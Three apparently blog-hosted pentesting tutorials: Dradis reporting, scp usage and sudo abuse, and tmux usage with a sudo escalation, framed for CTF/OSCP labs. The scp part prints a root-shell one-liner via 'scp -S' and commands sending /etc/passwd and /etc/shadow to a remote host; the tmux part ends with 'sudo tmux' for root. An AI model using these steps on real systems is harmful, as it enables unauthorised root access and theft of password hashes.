Dradis: Reporting and Collaboration Tool

Hello friends, today in this article we are going to familiarize you with one of the most vital tool of Kali that everybody needs in today’s era.

Eliminating bugs or finding any issue, is use to cover by everyone in their journey of pentesting. But apart from this one should also want to indulge own self into a task that need to perform in wide range i.e. “report writing”.

Writing a good report is an essential ability, almost an art, for penetration testers, and as for all the skills, can be enhanced through practice. There are many tools that helps for report writing but in this tutorial we are going to use “Dradis”.

Table of content

·        Introduction to report writing

·        What is Dradis

·        Working with Dradis

·        Conclusion

Report Writing

Penetration testing report is the core deliverable in any security valuation action. In this, the final deliverable is the report which shows the service provided, the methodology used, findings/results and the recommendation. This can be achieved by the use of many tools that Kali supports.

Similarly we are going to cover one of such tool in this tutorial i.e. “Dradis”.

What is Dradis? 

The Dradis framework is an open source collaboration and reporting platform for IT security experts. It is a platform independent tool developed in Ruby. In other word we can also say that It is a tool that helps for putting information together at one place.It also tends us the ability to organize all the information at one place. It allows us not only to import but also export output from the various tools that it supports.

Dradis is comprises with list of tool like: "Burp scanner, Nessus, NeXpose, Nikto, Nmap, and many more that are pretty common in doing penetration testing or ethical hacking.

Working with Dradis

In the next few steps, we will learn how to use Dradis. For begin this journey first we need to find Dradis. This can be done by two method.

First Method:

In this method we will just write dradis on Kali terminal and this will take you to its active status. Once this will be completed then it will take you to to its browser for login.   

Dradis is a self-contained web application. Hence, it will automatically open in the browser. The URL is  https://127.0.0.1:3000.

dradis

Second Method:

For attaining this method you need to Launch the Kali-Linux tool after that Click on “Applications”, go to “Reporting Tools” and click on “Dradis”.

Next step is to create a server password to access the application. Then enter the credentials which we configured for server

We are logged into the Dradis framework successfully. Now as in below screenshot you can see it’s showing three main operations that can be help in any report writing i.e. “all issues, methodologies, trash, nodes” so, we will use all these operations as per requirement of task in.

All issues: In this we have many options like we can add any issue manually, upload output, import result from library. These option also can help to import result of any tool in dradis.

Methodologies:  When it comes to penetration testing methodologies you can basically narrow the field down to three. These are:

·        Open Source Security Testing Methodology Manual (OSSTMM)

·        Penetration Testing Execution Standard (PTES)

·        National Institute of Standards and Technology

While all three are good methodologies but PTES and NIST 800-115 provide a bit more flexibility during penetration tests. Also, the methodologies more closely align with what’s taught in security course curriculum such as SANS. So whenever we need to add any methodology then we can use this option as reference.

Now, we will start on working with dradis. For begin this first we will create a new node by clicking on “nodes” tab after that click on the newly created node and then click the “add subnode” option to add sub-branch under a newly created node. Follow the same process to create multiple node and sub node as per your requirement.

We can create a tree as per our convenience. In the below screenshot, I have created two main node i.e. “Exploit” and “Host IP” which is sub-divided into metasploit, scanning and nmap. As shown below.

Upload File

After successful completion of creating no. of nodes and sub-nodes now our next step is to upload output of file with the help of tool.

For this first we need to select name of tool which we have used. In this we have used nmap so I will choose this option by using drop down button of “choose tool”.

After this we will search for the file that need to upload and then click to open button at the top of screen.

Once the process of uploading the will completed then you can see its output result in its output console as shown in below image.

To view the file, double-click the uploaded image and a new tab will be open in the browser to display the uploaded screenshot.

Similarly, we can upload scan results of other tools like Nessus, Burp, Nikto, Owasp ZAP, etc.

To view entire details of your result you can plugin.output option as shown below. In the below image its showing the result of nmap scan which I have saved in my file “scan.xml”

Creating notes

If you want to add description about what you have done in each nodes and sub-nodes then it can simply done by following below steps:

·        Select node

·        Click on notes

·        Click on add notes

·        Write description in space that is provided

·        Click on create note to confirm it.

In below image I have mentioned “IP” of my host machine as my note description. Similarly you can create note for any of node or sub-node to briefly describe your report.  After creating your notes you can further edit, delete, and rename it as per desire. You can also add any of attachment, screenshot or image by simply drag and drop to attachment field.

This article focused on main objective of using “Dradis” for creating any report rest all the options like “adding Issues, Methodologies” can be further use by user as per requirements.

Linux for Pentester: scp Privilege Escalation

In this article we are going to introduce another most helpful Linux command i.e. “scp” which is an abbreviated form of “secure copy”. The SCP command allows secure transferring of files between the local host and the remote host or between two remote hosts. So after knowing this fact we will check now how we can take advantage of this utility in privilege Escalation. 

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of content

Introduction to scp

Major Operation performed using scp

·         Copy a file from local system to remote machine

·         Copy a file from remote system to local machine

·         Provide modification time and date

·         To display detailed information of the SCP process

·         Copying file inside directory recursively

·         To specify a specific port

Exploiting scp

·         Abusing Sudo right

Introduction to scp

Scp is a built in command in linux which is used to SCP is used to copy file(s) between servers in secure way or in other word we can also say that it is a command line utility that allows you to securely copy files and directories between two locations. This possess the same authentication and safety as it is used in the Secure Shell (SSH) protocol. SCP also known for its effortlessness, security and pre-installed accessibility.

Major Operation performed using scp

In this tutorial, we will show you how to use the scp command with detailed explanations of the most common scp options. For this we will start from its help command as per below image.

scp --help

After checking for its help command now we will proceed to its major operation one by one.

·         Copy a file from local system to remote machine: As we know the scp command tends the user to securely copy the file or directory from local to host connection or vice-versa so, by taking the help of this fact now we will copy a file whose name as “scan.xml” which is stored in my local system. For doing this we will frame command as below:

Syntax: scp [file name] remote_username@:/path to copy

 scp scan.xml aarti@192.168.1.31:/home/aarti/Desktop

In above command “scan.xml” is the file name that I want to copy, “aarti” is remote user name, “192.168.1.31” is remote machine IP and ” /home/aarti/Desktop” is the path of remote machine where I want to copy this file.

Once we have done with our command then it will be prompted to enter the user password and the transfer process will start.

Note: Omitting the filename from the destination location copies the file with the original name. If you want to save the file under a different name you need to specify a new name too.

Hence on following above syntax our desired file has been successfully copied to destined location on remote system as shown below.

·         Copy a file from remote system to local machine: Alike above we can also copy a file or directory from its remote machine to local system. For grabbing this functionality follow the below command.

 Syntax: scp remote_username@:/[file name] /path of destination directory

scp aarti@192.168.1.31:/home/aarti/Desktop/demo.txt /root/Desktop

On framing above command, we will again be prompted to enter the user password and the transfer process will start.

ls -al

Hence our desired file has been successfully copied to destined location on local system from remote system

·         Provide modification time and date: Many times, you might be noticed that by default the time and date of copied file is use to be set for current time and date.

As in below image you can notice that our “demo.txt” file showing its “current date and time” when it has been copied.

ls -la /root/Desktop/demo.txt

But in below image I have shown the original date and time i.e. when the file had created.

ls -la demo.txt

So if we want to make modification of our copied file as its original details then we will use “-p” option for this. After adding this argument our file will be copied with its original date and time instead of copying with current details.

scp -p aarti@192.168.1.31:/home/aarti/Desktop/demo.txt /root/Desktop

ls -la /root/Desktop/demo.txt

·         To display detailed information of the SCP process: As in all above screenshot you can see that after you enter the password for copy the file there is no information about the SCP process but the only thing is it will prompt again once the process has been completed. So, if you want the detailed information of the SCP process, then you can use “-v” parameter for this.

scp -p -v aarti@192.168.1.31:/home/aarti/Desktop/demo.txt /root/Desktop

·         Copying file inside directory recursively: Sometimes we need to copy directory and all files / directories inside it. It will be better if we can do it in 1 command. SCP support that scenario using “-r” parameter.

scp -r fluxion/ aarti@192.168.1.31: /home/aarti/Desktop

In below image I have copied a file “fluxion” recursively.

Note: The speed for the process of copying any file is totally based upon its data length but we can increase this speed by using “-C” option which results faster for copy the file.

Here in below image we have successfully copied fluxion.

·         To specify a specific port: Usually, SCP use port 22 as a default port. But for security reason, if you wish to change the port into another port then you can use “-P” argument for this task.

For example, we are going to use port 2222. Then the command needs to be 

scp -P 2222 scan.xml aarti@193.168.1.31: /home/aarti/Desktop

Lab setups for Sudo privilege Escalation

Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Now we will start to perform privilege escalation for “scp”. For doing so we need to set up our lab of scp command with administrative rights.

After that we will give Sudo permission on scp, so that a local user can take privilege of scp as root user.

Hence type following for enabling SUID:

which scp

It can be clearly understood by the below image in which I have created a local user (test) and will add sudo right for scp program in the /sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /usr/bin/scp

First Method

Then we will look for sudo right of “test” user (if given) and found that user “test” can execute the scp command as “root” without a password.

sudo -l

On framing below command, it will direct us on root shell as shown below and we will successfully accomplished our task.

TF=$(mktemp)

echo 'sh 0<&2 1>&2' > $TF

chmod +x "$TF"

sudo scp -S $TF x y:

Second Method

For proceeding further in our task of privilege escalation by the help of second method very first we need to check status for ssh service which should be active during our entire process (Kali Linux).

service ssh status

Now I wish to copy passwd and shadow file of the host machine (Ubuntu) as per below image by the help of scp command.

sudo scp /etc/passwd komal@192.168.1.11:~/

sudo scp /etc/shadow komal@192.168.1.11:~/

On framing above command it will prompt to enter the user password so that transfer process will start.

Once you done with this then you can check whether your file has successfully copied or not by framing below command.

head /home/komal/shadow

head /home/komal/passwd

Conclusion: Hence we have achieved our mission and successfully copied passwd and shadow file by the use of scp command.

Reference : https://gtfobins.github.io/

Linux For Pentester: tmux Tutorial

In this article we going to describe “tmux” which is also known as terminal multiplexer.  It allows multiple terminal sessions to be retrieved concurrently in a single window. It is useful for running more than one command-line program at the same time. 

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of content

Introduction to tmux

·        What is tmux

·        How to use tmux

·        tmux framework

·        tmux commands

What is tmux: tmux also known as terminal multiplexer which creates a host server on your Linode and connects to it with a client window. If the client is disconnected, the server keeps running and as you reconnect to your Linode after rebooting your computer, you can reattach to the tmux session and the files you were working with will still be open.

In other word we can also say that this is a tool by the help of which we can open multiple windows and split views (called “panes” in tmux lingo) within one terminal window.

How to use tmux:  Alike others tmux also supports many commands to perform its function. Now we will describe each of its major operations one by one.

It can be attained by entering a key combination called the prefix and then typing a letter. There are many letters that are assigned to tmux for performing its task.

tmux framework: The entire operations that a tmux does can be easily understand by its hierarchical structure as shown below.

tmux commands: There are list of command that can help while working with tmux. Here in this article we are running the major operation that can be performed by the help of tmux.

Very first we will start from its help command. For this we need to write “--help” on our kali terminal as shown below.

tmux --help

The tmux operations are categorized into 3 selection which I have described above in its framework. So now we will start from first step i.e “sessions”

Operate tmux Sessions: Sometimes even multiple windows and panes aren’t enough and you need to separate the layouts logically by grouping them into separate sessions.

Sessions are useful for completely separating work environments.

There are many operations for the session using tmux which is shown in below image but I’m describing few of them.

·        Create new session: To create new session we will frame command as shown in below image.

tmux new -s Ignite

In the above command “-s” is used as argument for new session and “Ignite” is the name of new session that I want to create.

On framing above command tmux will create a new session by the name of Ignite which will highlight at the bottom of terminal. Similarly, one can create multiple session by different name as per need.

·        To list all created session: once we have done with creating all session as per desire then we can check it by command as:

tmux list-session

This will list all session as output that have been created. In below image tmux has listed all session which I have created by following the same procedure as above.

Operate tmux Window: When a tmux session starts, a single window is fashioned by default but tmux also supports a utility to attach multiple windows to the same session and we can switch between them as needed. This can be supportive when you want to run numerous jobs in parallel.

Apart from creating multiple window it also possesses many operations like rename any window, switch between window and many others.

At initial phase it shows “0:bash*” by default in which 0 represents the index value of window bash is the window name which can be rename as per need * denotes the working location  and when we create new window tmux highlights all window at the bottom of terminal.

Note: We know that working of tmux is done with joining prefix with any letter as per requirement. Find the below table to understand it clearly.

In this article I have created 5 windows as shown in below image. We know that working of tmux is done with joining prefix with any letter as per requirement.

·        Create new window: For creating new window we will use “-c” with prefix (ctrl-b).

Prefix (ctrl-b) +c

This will create new window. You can use same procedure for creating multiple window as below image.

·        Rename window: by default, tmux mention the window name as “bash” but we can also change it as per our wish. Here I’m renaming my last window as shown below.

Prefix (ctrl-b) + ,

·        To switch window: we can also switch within multiple window that helps to provide platform of working parallel. It can be done in many ways.

·        To display summary: To see the entire summary for whatever we have done till now we will use tmux option as:

Prefix (ctrl-b) + w

Operate tmux Panes: By the help of tmux we can divide each window into multiple panes. This is useful when you want outputs from multiple processes visible within a single window.

In this we have many options such as divide window into vertical, horizontal, rotating panes, switching to different panes. Now we will check each of this one by one.

Note: use below table for your reference

Here I have divided my window into 2 panes vertically by the command as:

Prefix (ctrl-b) + %

In below image I have further sub-divide my window horizontally.

Prefix (ctrl-b) + “

Suppose we have multiple panes containing some of information in each and we want to rotate our panes if we desire. Then will follow step as:

Prefix (ctrl-b) + {

On framing above command tmux will simply move the current pane to left.

SUID Lab setups for privilege Escalation

Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Now we will start to perform privilege escalation for “tmux”. For doing so we need to set up our lab of tmux command with administrative rights. After that we will check for the “tmux command” that what effect it has after getting sudo rights.

After that we will give SUID permission on tmux, so that a local user can take privilege of tmux as root user.

Hence type following for enabling SUID:

which tmux

visudo

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root.

To add sudo right open /sudoers file and type following as user Privilege specification.

test All=(root) NOPASSWD: /usr/bin/tmux

Exploiting Sudo rights

Now we will start exploiting tmux service by taking the privilege of sudoer’s permission. For this we need sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh test@192.168.1.31

Then we will look for sudo right of “test” user (if given) and found that user “test” can execute the tmux command as “root” without a password.

sudo -l

Now after knowing the fact that test user attains sudo rights so, taking this benefit here we can use tmux command to escalate the privileges of test user.

sudo tmux

Conclusion: This will launch new terminal with root privilege shell.